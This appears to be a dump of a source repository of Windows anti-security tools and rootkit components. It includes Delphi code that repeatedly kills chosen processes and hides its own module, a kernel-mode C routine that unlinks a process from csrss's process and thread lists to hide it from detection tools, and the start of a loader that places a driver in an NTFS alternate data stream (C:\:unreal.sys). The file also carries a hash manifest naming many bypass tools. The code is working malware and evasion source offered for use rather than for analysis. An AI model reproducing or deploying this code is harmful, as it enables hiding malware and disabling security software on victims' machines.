ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 85 | for c := 0 to Integer(buf^.uHandleCount) - 1 do 86 | if (buf^.rHandleTable[c].ProcessId = NtGetCurrentProcessId()) and (buf^.rHandleTable[c].ObjectTypeNumber = 5) then 87 | begin 88 | ProcessHandles[ProcessHandlesCount] := buf^.rHandleTable[c].Handle; 89 | 90 | bFound := false; 91 | if (ZwQueryInformationProcess(ProcessHandles[ProcessHandlesCount], ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO) = STATUS_SUCCESS) then 92 | begin 93 | 94 | for i := 0 to ProcessesMaxID do 95 | if (pbi.UniqueProcessId = ProcessesID[i]) then 96 | begin 97 | bFound := true; 98 | inc(ProcessHandlesCount); 99 | break; 100 | end; 101 | 102 | end; 103 | if not bFound then 104 | ProcessHandles[ProcessHandlesCount] := 0; 105 | 106 | end; 107 | bytesIO := 0; 108 | ZwFreeVirtualMemory(NtCurrentProcess, @buf, @bytesIO, MEM_RELEASE); 109 | end; 110 | result := (ProcessHandlesCount > 0); 111 | end; 112 | 113 | var 114 | dataBuf: LBuf; 115 | 116 | procedure KillProcesses(Usual: boolean); 117 | var 118 | i: integer; 119 | bytesIO: DWORD; 120 | buf: PSYSINFOBUF; 121 | begin 122 | if (Usual) then 123 | for i := 0 to ProcessHandlesCount - 1 do 124 | begin 125 | ZwTerminateProcess(ProcessHandles[i], 0); 126 | end; 127 | 128 | if (DbgUiConnectToDbg() <> STATUS_SUCCESS) then exit; 129 | 130 | for i := 0 to ProcessHandlesCount - 1 do 131 | begin 132 | if (DbgUiDebugActiveProcess(ProcessHandles[i]) = STATUS_SUCCESS) then 133 | ZwClose(ProcessHandles[i]); 134 | end; 135 | bytesIO := 4194304; 136 | buf := nil; 137 | ZwAllocateVirtualMemory(NtCurrentProcess, @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 138 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 139 | for i := 0 to buf^.uHandleCount - 1 do 140 | if (buf^.rHandleTable[i].ProcessId = NtGetCurrentProcessId()) then 141 | begin 142 | if (buf^.rHandleTable[i].ObjectTypeNumber = $8) then 143 | begin 144 | ZwClose(buf^.rHandleTable[i].Handle); 145 | break; 146 | end; 147 | end; 148 | bytesIO := 0; 149 | ZwFreeVirtualMemory(NtCurrentProcess, @buf, @bytesIO, MEM_RELEASE); 150 | end; 151 | 152 | function LdrHideDll(lpModule: PWideChar): THANDLE; stdcall; 153 | var 154 | pTeb1: PTEB; 155 | f: LIST_ENTRY; 156 | cur: PLIST_ENTRY; 157 | begin 158 | result := 0; 159 | asm 160 | mov eax, large fs:18h 161 | mov pTeb1, eax 162 | end; 163 | if (lpModule = nil) then 164 | begin 165 | result := Cardinal(pTeb1^.Peb^.ImageBaseAddress); 166 | exit; 167 | end; 168 | f := pTeb1^.Peb^.Ldr^.InLoadOrderModuleList; 169 | cur := f.Flink; 170 | while (true) do 171 | begin 172 | if (PLDR_MODULE(cur)^.EntryPoint <> nil) then 173 | if (PLDR_MODULE(cur)^.BaseDllName.PStr <> nil) and 174 | not IsBadReadPtr(PLDR_MODULE(cur)^.BaseDllName.PStr, PLDR_MODULE(cur)^.BaseDllName.Length) then 175 | if (strcmpiW(PLDR_MODULE(cur)^.BaseDllName.PStr, lpModule) = 0) then 176 | begin 177 | result := THANDLE(PLDR_MODULE(cur)^.DllBase); 178 | PLDR_MODULE(cur^.Blink)^.InLoadOrderModuleList.Flink := 179 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Flink; 180 | PLDR_MODULE(cur^.Flink)^.InLoadOrderModuleList.Blink := 181 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Blink; 182 | break; 183 | end; 184 | cur := cur^.Flink; 185 | if (cur = nil) or (cur = f.Flink) then break; 186 | end; 187 | end; 188 | 189 | function WatchDog(p1: pvoid): DWORD; stdcall; 190 | begin 191 | result := 0; 192 | EventHandle := 0; 193 | RtlInitUnicodeString(@str1, String5); 194 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 195 | if (ZwOpenEvent(@EventHandle, EVENT_ALL_ACCESS, @attr) = STATUS_SUCCESS) then 196 | begin 197 | ZwSetEvent(EventHandle, nil); 198 | ZwClose(EventHandle); 199 | end; 200 | 201 | LdrHideDll('ernel32.dll'); 202 | EventHandle := DWORD(GetModuleHandle('winsrv.dll')) + $7cdf; 203 | ZwSetInformationThread(NtCurrentThread, ThreadQuerySetWin32StartAddress, @EventHandle, sizeof(DWORD)); 204 | 205 | if FillProcessesArray() then 206 | begin 207 | KillProcesses(false); 208 | 209 | while true do 210 | begin 211 | NtSleep(200); 212 | if FillProcessesArray() then 213 | KillProcesses(true); 214 | OutputDebugStringW('Ololo'); 215 | end; 216 | 217 | end; 218 | end; 219 | 220 | procedure main(); 221 | var 222 | ThreadId: ULONG; 223 | begin 224 | ZwClose(CreateThread(nil, 0, @WatchDog, nil, 0, ThreadId)); 225 | end; 226 | 227 | asm 228 | call main 229 | xor eax, eax 230 | inc eax 231 | retn $000c 232 | end. 233 | 234 | -------------------------------------------------------------------------------- /Vault.sha256: -------------------------------------------------------------------------------- 1 | b3b036bb5214a924dc5ca73c76533dd642f11e09ff8a9ca698a71446a8cb3afd *Source\CsrWalker\9090.bmp 2 | 2fd47ce524e2b40cd625f87f28c893db540657126352cf72defe26cc6b935845 *Source\CsrWalker\bypass_csrwalker.c 3 | aea4ee7c685408bf570220884b84e52b82fe0832d155e759891d24574f437b29 *Source\CsrWalker\cwalker.dpr 4 | c0a909bff224325fc9e14ee4f312a62eca7eb31fbc150cf08d975542b7514e5f *Source\CsrWalker\Resources.res 5 | 8ad83aa00c9579522c2e8556e58b3e255b67860bfc1829e38c43428093933a63 *Source\Icie\Icie.dpr 6 | 024ccdabfe8b8e584d4897e7bd320e49b13acfce5d979e3e7c5216cffdb46bda *Source\Icie\info.txt 7 | 203e941e01d63ff61fbde274ba3be4d5b980f2e05b97f5368ca4c47d092594a6 *Source\OpPrevx\info.txt 8 | e568b090c98b551bb1b5d283bbe8d773e47822f7c70205210e0fda0a475ab9ea *Source\OpPrevx\Blovex\Blovex.dpr 9 | 9231135f45295ee299a2e0d41829977c17c4866fc1466c7c1c24c8862e05d611 *Source\OpPrevx\Blovex\Blovex_lib.dpr 10 | 1ea725e2a9a07a109f1088ebc70e422690f13d7e2eb38fa852d526afb73aff39 *Source\OpPrevx\Bovex\main.cpp 11 | b5fa44c777033fcff412dda232fa552096433497f962ea7b0837ac54c45aef85 *Source\OpPrevx\dev_190\UnPrevx.dpr 12 | eb150bff8859cbecaa0707d27f91a60ba8ef3272fdd11af4a3b31575d1b41659 *Source\OpPrevx\dev_190\unprevx_lib.dpr 13 | 215e02faef600737123f4ca6a4d5aba93178eea24d4c879f83c408b5b6da28ce *Source\OpPrevx\dev_191\UnPrevx.dpr 14 | 04e7ce822373327430d50be88b1be1389b14edb5bf94fce47727f8190d5b2851 *Source\OpPrevx\dev_191\unprevx_lib.dpr 15 | b6515b4b088b28bf33e800a5759645770f67e5a8d4b10145887dec38eed85bcd *Source\OpPrevx\v1.0.179\UnPrevx.dpr 16 | 05613532d34fee2582b26e2e553bdc0c9c29976f68c9d566ee93ea02e2227350 *Source\OpPrevx\v1.0.185\UnPrevx.dpr 17 | 6853660cb550e2472c82e65dcdedc1584fe1117742567054223a0c7ed59c4e4a *Source\OpPrevx\v1.0.187\UnPrevx.dpr 18 | f879cc1a951db95ebda46a62a524edc0c1b479e11f3d03db777711f1b906cdb6 *Source\OpPrevx\v1.0.187\unprevx_lib.dpr 19 | 54426e871c98d8d740377591643cea0136ce6f08d097c0c1ead7713c0b9746bf *Source\OpPrevx\v1.0.189\UnPrevx.dpr 20 | 85ae3ff6dafb95315147c9d281548fbab32d00dc61261579811a2c6c3c3aa9bc *Source\OpPrevx\v1.1.199\main.cpp 21 | 6e0293d24b58424f1ffec93db0b82005b5371aa2bf2f3e8f108f958d9c17094c *Source\OpPrevx\v1.1.199\UnPrevx.dpr 22 | 85ae3ff6dafb95315147c9d281548fbab32d00dc61261579811a2c6c3c3aa9bc *Source\OpPrevx\v1.1.209\main.cpp 23 | 25be410da19618bf60d07990ed51f59e3227a23e5aef505d79e3834b35a82bce *Source\OpPrevx\v1.1.209\UnPrevx.dpr 24 | d56f37c7a026e1b1e3d4cd31f14b6c58d968f3282eb5142aeaeb202d269f9243 *Source\OpPrevx\v1.1.220\lib.dpr 25 | 6fed25f265e40fe6b5a2e2a051a505ad735ea03583dbb8771d015ec7cdd1cf42 *Source\OpPrevx\v1.1.220\PrevxMe.dpr 26 | e674d1607537697cbd83e3f1f02ea401a2d9767c6248a26acb4a4a3142adbc42 *Source\oXueTb\info.txt 27 | e9c1d984dd8c2c115f8ffe805fb490e94385c4bb37407ee46833ee3cb329219a *Source\oXueTb\oXueTb.dpr 28 | ed0122959526ab79f6b0d0dc6a47fc1595e2dfd7e29095394b000b5e940ac261 *Source\oXueTb\oxuetb_lib.dpr 29 | a22c447139df94a3131e155ca201e2665b38991bfd904f84a21f6a00ff614933 *Source\RkUnhooker_1020\readme.txt 30 | 448780545164493bb00269b94353d69f239e7a9b8b7c4a50a50ee62b1e93d94e *Source\RkUnhooker_1020\RKUnHooker.DPR 31 | b9af5dc912112a0678b8bbd20d4cc24dc4a13c30e6e2f168bcd535eedf2b5095 *Source\RkUnhooker_2027\RKUnHooker.DPR 32 | 3d535c9855dbdd452de798dd9c06f2a86032300bc6e7c77f6fcba8a5d3623ef1 *Source\RTL\FPU.pas 33 | 3d90010a9aa5d522785b2aea01530dccb53ba14044b0b0ad719e0f2d482e99b7 *Source\RTL\RTL.pas 34 | a919f709cc4e5abc83d4be075807468a4a45f9b412b4e4c3a524e613b1368b49 *Source\SilentDeath\info.txt 35 | 343a98127a2e4148a096755523516f67f844fb92d30c29e2dc67a6ed8ca2e5f0 *Source\SilentDeath\vcode.res 36 | 46227fa73844d6ab28ade0e7078aaa2841b69ef5eaeb3b01ba20f2c9873453de *Source\SilentDeath\vmain.dpr 37 | 77b07a4d5aa5444608e3e7badfede960713402607beb2b83d50b7fb2e8765f52 *Source\SpiDiE\info.txt 38 | 4507b2f859da2012c0d7ca987d725595e0f3711084cf80196a49f0b6a0a491d8 *Source\SpiDiE\DwUnProt\1.0\main.cpp 39 | 64388d53fe26d4a53ca8e3430b88150a8182a52da01c94e51d65f6a288ed3537 *Source\SpiDiE\DwUnProt\1.1\main.cpp 40 | 842e334f1ab508263e5dc1e7c88426538a68eeef3ec27cdba3d1790e9f77638d *Source\SpiDiE\SPiDiE_by_rinn_2012\dwbypass\dll\main.cpp 41 | 15a0df93e6a3802c8f3232234044602d5a442dedd8c8ca31e2aa6e687947c54d *Source\SpiDiE\SPiDiE_by_rinn_2012\dwbypass\exe\main.cpp 42 | 6ac1220b599e0a0218da1371425d361f72f913b10440447ab72e32c1f8c06d65 *Source\SpiDiE\SPiDiE_by_rinn_2012\SpiDiE_EX\dll\export.def 43 | 69ab100876533c9e2b51cd79c6aa1664c3b25a0579274268143b3c0b84bc4c76 *Source\SpiDiE\SPiDiE_by_rinn_2012\SpiDiE_EX\dll\main.cpp 44 | 90ba0f45f0d79da701c56dc984bba5061835e145e9911ae92dd233b174c80631 *Source\SpiDiE\SPiDiE_by_rinn_2012\SpiDiE_EX\exe\vtest.dpr 45 | 541a87e99553c943da0de5f124e21ff1d3097558ef5e1b8a1aabb946c5008bb3 *Source\SpiDiE\SPiDiE_by_rinn_2012\SpiDiE_v1.6\Ring0.pas 46 | 9809c4b1017fbc849f44ffc3798e508d359ad57ff27b1c241396e990af2a6b61 *Source\SpiDiE\SPiDiE_by_rinn_2012\SpiDiE_v1.6\SpiDiE.dpr 47 | afe71131c1ac63eabf6bc84fc4c98a99c78f91ea1a6dc463174842616b85110c *Source\SpiDiE\SPiDiE_by_rinn_2012\SpiDiE_v1.6\Stub.pas 48 | cdfdfc84ba6e50c9560c92ae89ac7577990d65b166fab4985bc9a7619553c991 *Source\SpiDiE\v1.0 beta\Old_SpiDiE.dpr 49 | edde26bb767ece3d47442692a5ef1449957685dce2b78c2a3b253b5e913cdd76 *Source\SpiDiE\v1.2 release\resource.h 50 | 595f130a585110fe17e9c13f7d07cdf990c6de3dd0181d4bc2103f5ab65240ec *Source\SpiDiE\v1.2 release\Ring0.pas 51 | 45a22ea1c7dae96e6f4edfcf05f62e1afa7081a90a76ce8f2f972dea80ca2b83 *Source\SpiDiE\v1.2 release\SpiDiE.dpr 52 | 15cb61a624db802b9de6e12f850846dedba16d72630a5a00079c3a882eb58040 *Source\SpiDiE\v1.2 release\version.rc 53 | 2500b7d114b845dd8b762ec1d0c1fcf67883caa9ccb1e77a9b3f36285b44e0a1 *Source\SpiDiE\v1.3 beta\Ring0.pas 54 | 7f47650d49dba556c97d18ed8ba6ab3feead43a768e954eccf0b00553bd4e6f8 *Source\SpiDiE\v1.3 beta\SpiDiE.dpr 55 | 1dbda3c8bbde7616e81611b9672b3abba2bc3ba5a73da33c2224f86f6ded4b52 *Source\SpiDiE\v1.3 release\Ring0.pas 56 | a8528e7c8ec20959455fa18e82308f2b3ae4d0d9069df7e9e7ff208b3e52fc6e *Source\SpiDiE\v1.3 release\SpiDiE.dpr 57 | 0ce1e63539720a20d41cdc3b6dd20fd7dcfc106fe97afbfb9f8f6b0be51296d8 *Source\SpiDiE\v1.4 release\dwunprot.dpr 58 | 7e6c85a3194b692fe1a555551b7fbb3dea554dc19b701a0d86139db911446aed *Source\SpiDiE\v1.4 release\SpiDiE.dpr 59 | 0ce1e63539720a20d41cdc3b6dd20fd7dcfc106fe97afbfb9f8f6b0be51296d8 *Source\SpiDiE\v1.4.1 release\dwunprot.dpr 60 | d00cba3dd28537b10eaa396053e5c7eab05d9c656c9ec0f0ba4c73116fdea455 *Source\SpiDiE\v1.4.1 release\SpiDiE.dpr 61 | 0ce1e63539720a20d41cdc3b6dd20fd7dcfc106fe97afbfb9f8f6b0be51296d8 *Source\SpiDiE\v1.4.2 release\dwunprot.dpr 62 | d00cba3dd28537b10eaa396053e5c7eab05d9c656c9ec0f0ba4c73116fdea455 *Source\SpiDiE\v1.4.2 release\SpiDiE.dpr 63 | ec5986ee027def02563cb37a9081acefc75f67161fa03887b48bb3c15bf2f14f *Source\SpiDiE\v1.4.3 release\dwunprot.dpr 64 | d00cba3dd28537b10eaa396053e5c7eab05d9c656c9ec0f0ba4c73116fdea455 *Source\SpiDiE\v1.4.3 release\SpiDiE.dpr 65 | 59f4254f6a83f7aed3351202d2e4597e38f33cf07e7ff67a3b14cbf284f34726 *Source\SpiDiE\v1.4.4 G2 release\dwunprot.dpr 66 | 69cf9de5d7d085560e06c9ae28d93f6a17d92c51015f65231648a55f61cb3eed *Source\SpiDiE\v1.4.4 G2 release\SpiDiE.dpr 67 | ec5986ee027def02563cb37a9081acefc75f67161fa03887b48bb3c15bf2f14f *Source\SpiDiE\v1.4.5 release\dwunprot.dpr 68 | 1397dfac538d5a37e0db8013281c259a0816b838b85a1203da150f67232bc665 *Source\SpiDiE\v1.4.5 release\SpiDiE.dpr 69 | ec5986ee027def02563cb37a9081acefc75f67161fa03887b48bb3c15bf2f14f *Source\SpiDiE\v1.4.6 release\dwunprot.dpr 70 | e07e494ab85753da96d2606c21c58f0db2af4ead1437265db66bd36a60ed98b9 *Source\SpiDiE\v1.4.6 release\SpiDiE.dpr 71 | 4d14ea023fd02456dc0e701cc4c9aee8ecb1da3da645066a9759c787fc2fa379 *Source\SpiDiE\v1.4.7 release\dwunprot.dpr 72 | e07e494ab85753da96d2606c21c58f0db2af4ead1437265db66bd36a60ed98b9 *Source\SpiDiE\v1.4.7 release\SpiDiE.dpr 73 | 1fe8a6917b35b9eaa90683e23ea05bd5371dc7a864df7615c395ead61fe63adc *Source\SpiDiE\v1.5 RC\SpiDiE.dpr 74 | afe71131c1ac63eabf6bc84fc4c98a99c78f91ea1a6dc463174842616b85110c *Source\SpiDiE\v1.5 RC\Stub.pas 75 | bda56bd57c019b6441de150654e04c681637b1033b9bdaa59a53d12744ea8f4a *Source\SpiDiE\v1.5 release\Ring0.pas 76 | cdae4cb84a533a53963f571b190dc6c76307aaddab82e51b2f6083d5de75db72 *Source\SpiDiE\v1.5 release\SpiDiE.dpr 77 | afe71131c1ac63eabf6bc84fc4c98a99c78f91ea1a6dc463174842616b85110c *Source\SpiDiE\v1.5 release\Stub.pas 78 | d1e705232e2d593e513256b660b92cdea1e9530116b6c9a47e4488bd0346b9d9 *Source\SpiDiE\v2.0 release\dwunprot.dpr 79 | ee0c099d579ff638dccdd6a91e8e75eb91166d34b60f24a44b23c2084ef9e663 *Source\SpiDiE\v2.0 release\SpiDiE.dpr 80 | 9e5a0497b24ed3c712d40252c1925b7758ff187369f568192e785fb8d847e53a *Source\SpiDiE\v2.1 release\dwunprot.dpr 81 | 7bbd38dab2e29b69616eb545d6afa287e447c1077f88c8debb37ff2090e9569b *Source\SpiDiE\v2.1 release\SpiDiE.dpr 82 | 54d6e8ec1fc62aa9e6707c9072f8a372fb86da42f0a4089816f72d6eaa0a2455 *Source\SpiDiE\v2.1.1 release\dwunprot.dpr 83 | f711fb28044aef3d1566f31d1b177a49d91cadd0ea7d4d66ad6bb27891c4de1e *Source\SpiDiE\v2.1.1 release\SpiDiE.dpr 84 | 22b1528d94912f140648802a3083b29dacc76c494ef3659002277e850ac4e2c2 *Source\SpiDiE\v2.2 release\dwunprot.dpr 85 | 3ed930de7443adec0186ca1af7baf9c443c64cad2c6064ac3b70c40034817c93 *Source\SpiDiE\v2.2 release\SpiDiE.dpr 86 | 57a3e6bf1f15ee78543fba10499be5d3ec38807a424dd67dc71fb3e586a4bb11 *Source\Unreal_A\main.cpp 87 | a972ea4e9e567ddc0d3056c70b0427f6de6056b0d8a061f0585bf9657ef91e7c *Source\Unreal_A\Unreal.DPR 88 | -------------------------------------------------------------------------------- /Source/CsrWalker/bypass_csrwalker.c: -------------------------------------------------------------------------------- 1 | /* 2 | Anti CsrWalker from r0 by Orkblutt 3 | ( http://orkblutt.free.fr ) 4 | 5 | Original idea and implementation by 0vercl0ck 6 | http://overclok.free.fr/Codes/PspCidTable/UnlinkInCrss%20-%20Ring0.html 7 | http://0vercl0k.blogspot.com/ 8 | 9 | modified to unlink CSR_THREAD and to work under Vista 10 | */ 11 | 12 | int UnlinkIt(ULONG Pid, PEPROCESS pCsrss) 13 | { 14 | PEPROCESS pCurrentEprocess; 15 | PLIST_ENTRY pleCurrent; 16 | LIST_ENTRY lEntry; 17 | ULONG ulStartingValue; 18 | KAPC_STATE kApcState; 19 | PUCHAR pPeb , pPebLdr , pPebLdrEntry , imgBaseCsrsrv , name , CsrLockProcessByClientId = 0 , CsrRootProcess , CsrLockThreadByClientId, CsrThreadHashTable ; 20 | PIMAGE_DOS_HEADER pImgDosHeader; 21 | PIMAGE_NT_HEADERS pImgNtHeader; 22 | PIMAGE_EXPORT_DIRECTORY pImgExportDirectory; 23 | PULONG rvaNameTable , rvaAdressTable; 24 | int i; 25 | PCSR_PROCESS pCsrProcess; 26 | PCSR_THREAD pCsrHashThread; 27 | 28 | imgBaseCsrsrv = NULL; 29 | CsrLockProcessByClientId = NULL; 30 | CsrLockThreadByClientId = NULL; 31 | CsrThreadHashTable = NULL; 32 | 33 | 34 | 35 | 36 | KeStackAttachProcess( (PKPROCESS)pCsrss , &kApcState ); 37 | 38 | 39 | pPeb = (PUCHAR)*(PULONG)((PUCHAR)pCsrss + 0x1b0); // +0x1b0 Peb : Ptr32 _PEB 40 | pPebLdr = (PUCHAR)*(PULONG)(pPeb + 0x00c); // +0x00c Ldr : Ptr32 _PEB_LDR_DATA 41 | 42 | pleCurrent = (PLIST_ENTRY)(pPebLdr+0x00c); //+0x00c InLoadOrderModuleList : _LIST_ENTRY 43 | pPebLdrEntry = (PUCHAR)pleCurrent->Flink; 44 | ulStartingValue = (ULONG)pPebLdrEntry; 45 | pleCurrent = (PLIST_ENTRY)pleCurrent->Flink; 46 | 47 | 48 | 49 | while (ulStartingValue != (ULONG)pleCurrent->Flink) 50 | { 51 | // DbgPrint("Modul : %ws.\n" , *(PULONG)(pPebLdrEntry+0x024+0x004) ); //+0x024 FullDllName : _UNICODE_STRING // +0x004 Buffer : Ptr32 Uint2B 52 | if ( wcsstr( (wchar_t*)*(PULONG)(pPebLdrEntry+0x024+0x004) , L"CSRSRV.dll" ) != NULL ) 53 | { 54 | imgBaseCsrsrv = (PUCHAR)*(PULONG)(pPebLdrEntry + 0x018) ; // +0x018 DllBase : Ptr32 Void 55 | break; 56 | } 57 | pPebLdrEntry = (PUCHAR)pleCurrent->Flink; 58 | pleCurrent = (PLIST_ENTRY)pleCurrent->Flink; 59 | } 60 | if (imgBaseCsrsrv == NULL) 61 | { 62 | KeUnstackDetachProcess( &kApcState ); 63 | return 0; 64 | } 65 | 66 | //DbgPrint("Image Base Csrsrv.dll : %x." , imgBaseCsrsrv ); 67 | 68 | /* */ 69 | /* Parcours de son EAT */ 70 | 71 | pImgDosHeader = (PIMAGE_DOS_HEADER)imgBaseCsrsrv; 72 | pImgNtHeader = (PIMAGE_NT_HEADERS)(imgBaseCsrsrv + pImgDosHeader->e_lfanew); 73 | pImgExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(imgBaseCsrsrv + pImgNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 74 | 75 | rvaNameTable = (PULONG)(imgBaseCsrsrv + pImgExportDirectory->AddressOfNames); 76 | rvaAdressTable = (PULONG)(imgBaseCsrsrv + pImgExportDirectory->AddressOfFunctions); 77 | 78 | for ( i = 0 ; i < (int)pImgExportDirectory->NumberOfFunctions ; i++) 79 | { 80 | //DbgPrint("Function : %s.\n" , imgBaseCsrsrv + rvaNameTable ); 81 | if ( strcmp("CsrLockProcessByClientId" , (const char *)imgBaseCsrsrv + rvaNameTable) == 0 ) 82 | { 83 | CsrLockProcessByClientId = imgBaseCsrsrv + rvaAdressTable; 84 | // DbgPrint("CsrLockProcessByClientId : %x.\n" , CsrLockProcessByClientId ); 85 | break; 86 | } 87 | } 88 | if ( CsrLockProcessByClientId == NULL ) 89 | { 90 | KeUnstackDetachProcess( &kApcState ); 91 | return 0; 92 | } 93 | 94 | 95 | for ( i = 0 ; i < 50 ; i++ ) 96 | { 97 | if ( (*(CsrLockProcessByClientId+i) == 0x83) && (*(CsrLockProcessByClientId+i+1) == 0x22) && (*(CsrLockProcessByClientId+i+2) == 0x00) && (*(CsrLockProcessByClientId+i+3) == 0x8B) && (*(CsrLockProcessByClientId+i+4) == 0x35) && 98 | (*(CsrLockProcessByClientId+i+9) == 0x83) && (*(CsrLockProcessByClientId+i+10) == 0xC6) && (*(CsrLockProcessByClientId+i+11) == 0x08) ) 99 | { 100 | CsrRootProcess = (PUCHAR)*(PULONG)(*(PULONG)(CsrLockProcessByClientId+i+5)); 101 | break; 102 | } 103 | } 104 | if ( i == 50 ) 105 | { 106 | KeUnstackDetachProcess( &kApcState ); 107 | return 0; 108 | } 109 | 110 | 111 | pCsrProcess = (PCSR_PROCESS)CsrRootProcess; 112 | 113 | 114 | pCurrentEprocess = IoGetCurrentProcess(); 115 | ulStartingValue = (ULONG)pCurrentEprocess; 116 | 117 | do 118 | { 119 | if (Pid == *(PULONG)((PUCHAR)pCurrentEprocess + 0x084)) 120 | break; 121 | 122 | pleCurrent = (PLIST_ENTRY)((PUCHAR)pCurrentEprocess + 0x88); // +0x088 ActiveProcessLinks : _LIST_ENTRY 123 | pCurrentEprocess = (PEPROCESS)((PUCHAR)pleCurrent->Flink - 0x88); 124 | 125 | } 126 | while ((ULONG)pCurrentEprocess != ulStartingValue); 127 | 128 | if ((ULONG)pCurrentEprocess == ulStartingValue) 129 | { 130 | KeUnstackDetachProcess( &kApcState ); 131 | return 0; 132 | } 133 | 134 | 135 | 136 | i = 0; 137 | 138 | lEntry = pCsrProcess->ListLink; 139 | ulStartingValue = (ULONG)pCsrProcess; 140 | pCsrProcess = (PCSR_PROCESS)((PUCHAR)lEntry.Flink - 0x8); 141 | 142 | 143 | while (ulStartingValue != (ULONG)pCsrProcess) 144 | { 145 | if ( (ULONG)pCsrProcess->ClientId.UniqueProcess == *(PULONG)((PUCHAR)pCurrentEprocess + 0x084) ) // +0x084 UniqueProcessId : Ptr32 Void 146 | { 147 | *(PULONG)(pCsrProcess->ListLink.Blink) = (ULONG) pCsrProcess->ListLink.Flink; 148 | *(PULONG)((PUCHAR)pCsrProcess->ListLink.Flink + 4) = (ULONG)pCsrProcess->ListLink.Blink; 149 | i = 1; 150 | } 151 | 152 | lEntry = *(lEntry.Flink); 153 | pCsrProcess = (PCSR_PROCESS)((PUCHAR)lEntry.Flink - 0x8); 154 | } 155 | if ( i == 0 ) 156 | { 157 | KeUnstackDetachProcess( &kApcState ); 158 | return 0; 159 | } 160 | 161 | for ( i = 0 ; i < (int)pImgExportDirectory->NumberOfFunctions ; i++) 162 | { 163 | if ( strcmp("CsrLockThreadByClientId" , (const char *)imgBaseCsrsrv + rvaNameTable) == 0 ) 164 | { 165 | CsrLockThreadByClientId = imgBaseCsrsrv + rvaAdressTable; 166 | break; 167 | } 168 | } 169 | 170 | if ( CsrLockThreadByClientId == NULL ) 171 | { 172 | KeUnstackDetachProcess( &kApcState ); 173 | return 0; 174 | } 175 | 176 | 177 | for ( i = 0 ; i < 50 ; i++ ) 178 | { 179 | if ( (*(CsrLockThreadByClientId+i) == 0x8D) && (*(CsrLockThreadByClientId+i+2) == 0xC5)) 180 | { 181 | CsrThreadHashTable = (PUCHAR)(*(PULONG)(CsrLockThreadByClientId+i+3)); 182 | break; 183 | } 184 | } 185 | if(CsrThreadHashTable == 0) 186 | { 187 | KeUnstackDetachProcess( &kApcState ); 188 | return 0; 189 | } 190 | 191 | for (i = 0; i < 256; i++) 192 | { 193 | PLIST_ENTRY ListHead, NextEntry; 194 | 195 | ListHead = (PLIST_ENTRY)(CsrThreadHashTable + (8 * i)); 196 | 197 | NextEntry = ListHead->Flink; 198 | 199 | while (NextEntry != ListHead) 200 | { 201 | pCsrHashThread = CONTAINING_RECORD(NextEntry, CSR_THREAD, HashLinks); 202 | if (pCsrHashThread) 203 | { 204 | if ((ULONG)pCsrHashThread->Process->ClientId.UniqueProcess == Pid) 205 | { 206 | *(PULONG)(NextEntry->Blink) = (ULONG) NextEntry->Flink; 207 | *(PULONG)((PUCHAR)NextEntry->Flink + 4) = (ULONG)NextEntry->Blink; 208 | } 209 | } 210 | NextEntry = NextEntry->Flink; 211 | } 212 | } 213 | 214 | KeUnstackDetachProcess( &kApcState ); 215 | return 1; 216 | } 217 | 218 | 219 | void UnlinkFromCsrss(ULONG PidToHide) 220 | { 221 | 222 | PEPROCESS pCurrentEprocess; 223 | PLIST_ENTRY pleCurrent; 224 | ULONG ulStartingValue; 225 | 226 | pCurrentEprocess = IoGetCurrentProcess(); 227 | ulStartingValue = (ULONG)pCurrentEprocess; 228 | 229 | do 230 | { 231 | if (strncmp("csrss.exe" , (const char *)pCurrentEprocess + 0x174 , 15) == 0) 232 | { 233 | if(UnlinkIt(PidToHide, pCurrentEprocess)) 234 | DbgPrint("%d unlinked from csrss:%d\n", PidToHide, *(PULONG)((PUCHAR)pCurrentEprocess + 0x084)); 235 | else 236 | DbgPrint("can't unlink %d from csrss:%d\n", PidToHide, *(PULONG)((PUCHAR)pCurrentEprocess + 0x084)); 237 | 238 | } 239 | pleCurrent = (PLIST_ENTRY)((PUCHAR)pCurrentEprocess + 0x88); 240 | pCurrentEprocess = (PEPROCESS)((PUCHAR)pleCurrent->Flink - 0x88); 241 | 242 | } 243 | while ((ULONG)pCurrentEprocess != ulStartingValue); 244 | } -------------------------------------------------------------------------------- /Source/Unreal_A/Unreal.DPR: -------------------------------------------------------------------------------- 1 | {$E EXE} 2 | {$IMAGEBASE $00400000} 3 | {$R-} 4 | {$Q-} 5 | 6 | {$IFDEF minimum} 7 | program Unreal; 8 | {$ENDIF} 9 | unit Unreal; 10 | interface 11 | implementation 12 | 13 | uses 14 | Windows, WinNative, commctrl, Messages, WinSvc2, RTL; 15 | 16 | {$R Res1.res} 17 | 18 | type 19 | PEXCEPTION_POINTERS = ^_EXCEPTION_POINTERS; 20 | 21 | 22 | const 23 | IOPortServiceFilePath: PWideChar = '\??\C:\:unreal.sys'; 24 | IOPortServiceFilePath2: PWideChar = 'C:\:unreal.sys'; 25 | IOPortServiceKey: PWideChar = '\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\unreal'; 26 | RegKey1: PWideChar = 'SYSTEM\CurrentControlSet\Services\unreal'; 27 | RegKey2: PWideChar = '\Enum'; 28 | str_ImagePath: PWideChar = 'ImagePath'; 29 | str_ErrorControl: PWideChar = 'ErrorControl'; 30 | str_Start: PWideChar = 'Start'; 31 | str_Type: PWideChar = 'Type'; 32 | 33 | var 34 | prev: boolean; 35 | osver: OSVERSIONINFOW; 36 | MutexHandle: THANDLE; 37 | hinst: DWORD; 38 | CurrentDirectory: LBuf; 39 | MainWindow: HWND = 0; 40 | quit: boolean = false; 41 | 42 | function Unreal_DeleteFile(const FileName: PWideChar): boolean; 43 | begin 44 | result := DeleteFileW(FileName); 45 | if FileExistsW(FileName) then 46 | begin 47 | Sleep(1000); 48 | result := DeleteFileW(FileName); 49 | end; 50 | end; 51 | 52 | function Unreal_IsNTFS(lpFileName: PWideChar): integer; 53 | var 54 | fsname: LBuf; 55 | disk_buf: LBuf; 56 | l, fsfl: DWORD; 57 | begin 58 | memzero(@fsname, sizeof(fsname)); 59 | memzero(@disk_buf, sizeof(disk_buf)); 60 | 